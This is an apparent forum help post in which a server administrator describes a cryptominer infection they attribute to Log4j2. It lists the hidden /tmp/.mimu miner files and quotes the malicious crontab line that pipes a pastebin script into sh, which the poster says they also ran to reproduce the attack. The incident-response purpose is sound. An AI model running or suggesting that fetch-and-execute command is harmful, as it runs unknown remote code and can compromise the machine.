18
服务器被挖矿,找到相关文件及计划任务, google 过关键词得知是 Log4j2 漏洞导致被入...
source link: https://www.v2ex.com/t/845286
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
服务器被挖矿,找到相关文件及计划任务, google 过关键词得知是 Log4j2 漏洞导致被入侵,想知道该病毒运行的逻辑,找不到相关 sh 文件,求大佬指点。
callmebigfaceman · 10 小时 11 分钟前 · 838 次点击环境介绍: 1 、redhat 6.3 2 、对外开启了 9000:80 端口的映射 3 、强密码验证(限制指定 IP 通过 ssh 连接)
已知信息: 1 、crontab -l 得知被添加了计划任务:curl -fsSL https://pastebin.com/raw/8DdBvkRn | sh (我尝试得到该脚本,但是请求出来只是字符串‘#endif’,我该如何得到该病毒脚本? top 查看进程时候有看到 /tmp/.mimu/apache.sh ,但是实际去查看该病毒目录,并没有发现脚本,是否加载在内存中,实际脚本已被删除?) https://imgur.com/Huflmd7 https://imgur.com/2PZNjXR
2 、已知该脚本会生成隐藏目录 /tmp/.mimu/,下面包含挖矿程序 kthmimu 及配置文件 config.json https://imgur.com/Huflmd7
已自行尝试复现的测试: 1 、尝试 curl -fsSL https://pastebin.com/raw/8DdBvkRn | sh ,但是我并没有发现脚本文件及复现
求助: 1 、如何找出该脚本及实现逻辑? 2 、如何防范?
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK